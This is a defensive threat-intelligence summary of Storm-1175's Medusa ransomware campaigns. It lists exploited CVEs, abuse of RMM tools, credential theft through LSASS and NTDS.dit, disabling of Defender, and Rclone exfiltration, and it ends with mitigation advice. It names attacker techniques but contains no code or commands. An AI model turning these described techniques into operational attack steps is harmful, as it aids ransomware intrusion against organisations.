Storm‑1175 exploits web‑facing vulnerabilities in Medusa ransomware operations

Threat summary

On April 6, 2026, Microsoft published a security report on Storm‑1175, a threat actor active since at least 2023, and linked to China. The group appears financially motivated rather than state‑sponsored and is responsible for multiple Medusa ransomware deployments. Targeted sectors include healthcare, education, professional services, and finance across Australia, the United Kingdom, and the United States.

Storm‑1175 focuses on exploiting newly disclosed vulnerabilities in internet‑facing systems and then leveraging legitimate administrative tools to move laterally. To date, the group has exploited more than 16 vulnerabilities across major enterprise platforms, including Microsoft Exchange, Papercut, Ivanti, ConnectWise, TeamCity, GoAnywhere, SmarterMail, and BeyondTrust.

Microsoft’s analysis shows that the group operates at a rapid pace. Storm‑1175 monitors vulnerability disclosures closely and weaponizes exploits faster than most organizations can patch. They have exploited vulnerabilities within hours of disclosure and, in several cases, before public disclosure. Examples include SmarterMail CVE‑2026‑23760 and GoAnywhere MFT CVE‑2025‑10035, both exploited a week prior to disclosure, and SAP NetWeaver CVE‑2025‑31324, exploited one day after disclosure.

Once inside a network, Storm‑1175 follows a consistent post‑exploitation process. The group establishes command‑and‑control through legitimate remote monitoring and management tools, including SimpleHelp, Atera, N‑able, ScreenConnect, AnyDesk, and MeshAgent, allowing their activity to blend with routine administration. Lateral movement is carried out using PowerShell, PsExec, Windows Management Instrumentation, and Cloudflare tunnels.

Their credential‑theft activity includes LSASS dumping, NTDS.dit extraction, and harvesting Veeam credentials. They also disable Microsoft Defender Antivirus through registry changes and broad exclusion paths to reduce detection. Data exfiltration typically occurs through Rclone, and mass ransomware deployment is executed using PDQ Deployer or Group Policy, followed by the actor deploying Medusa ransomware variants, including Gaze.exe.

Analysis

Storm1175’s operations show that the primary risk is the gap between vulnerability disclosure and patching. Their ability to exploit flaws within hours, and in some cases before disclosure, means any internet-facing system with a known vulnerability should be assumed to be high risk. Their use of legitimate RMM tools and standard administrative utilities reduces early detection opportunities, and their focus on domain controllers, backup systems, and endpoint protection settings increases the likelihood of successful ransomware deployment and complicates recovery.

The most effective defenses are those that reduce exposure on perimeter assets, restrict administrative pathways, and harden identity and endpoint controls.

• Prioritize rapid patching for all internet-facing systems; treat new CVEs affecting perimeter services as emergency changes.

• Restrict RMM usage to approved tools, enforce MFA, and alert on any unapproved installations or executions.

• Strengthen identity protections by enforcing least privilege, monitoring for credential access attempts, and securing backup infrastructure with MFA and segmentation.

• Lock down endpoint protection settings with tamper-resistant policies and treat any configuration changes as high risk events.

• Monitor for unusual data movement activity and unauthorized use of deployment tools such as PDQ or GPO, which often precede ransomware execution.

Stay on top of emerging threats like this.

Sign up to receive a weekly roundup of our security intelligence feed. You'll be the first to know of emerging attack vectors, threats, and vulnerabilities. 

Sign up